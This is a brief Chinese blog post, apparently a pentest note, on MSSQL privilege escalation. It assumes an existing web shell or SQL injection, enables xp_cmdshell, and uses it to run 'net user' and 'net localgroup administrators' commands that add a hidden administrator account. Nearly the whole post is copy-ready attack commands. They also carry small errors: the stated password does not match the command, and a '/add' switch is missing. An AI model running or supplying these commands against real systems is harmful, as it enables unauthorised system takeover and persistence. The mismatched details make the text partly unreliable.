• MSSQL提权之xp_cmdshell


    0x01 前提

    1. getshell或者存在sql注入并且能够执行命令。

    2. sql server是system权限,sql server默认就是system权限。

    0x02 xp_cmdshell

    有了xp_cmdshell的话可以执行系统命令,该组件默认是关闭的,因此需要把它打开。

    开启xp_cmdshell

    exec sp_configure 'show advanced options', 1;reconfigure;
    exec sp_configure 'xp_cmdshell',1;reconfigure;

    关闭xp_cmdshell

    exec sp_configure 'show advanced options', 1;reconfigure;
    exec sp_configure 'xp_cmdshell', 0;reconfigure

    0x03 提权

    exec master..xp_cmdshell 'net user test pinohd123. /add'    添加用户test,密码test
    exec master..xp_cmdshell 'net localgroup administrators test add'    添加test用户到管理员组
     



  • 相关阅读:
    Hbase表的管理
    Hbase指定规则扫描表
    vim配置
    caogao
    go on shell
    实习总结
    shell 脚本
    hadoop实战
    awk使用
    java reflect
  • 原文地址:https://www.cnblogs.com/-qing-/p/10692824.html
Copyright © 2020-2023  润新知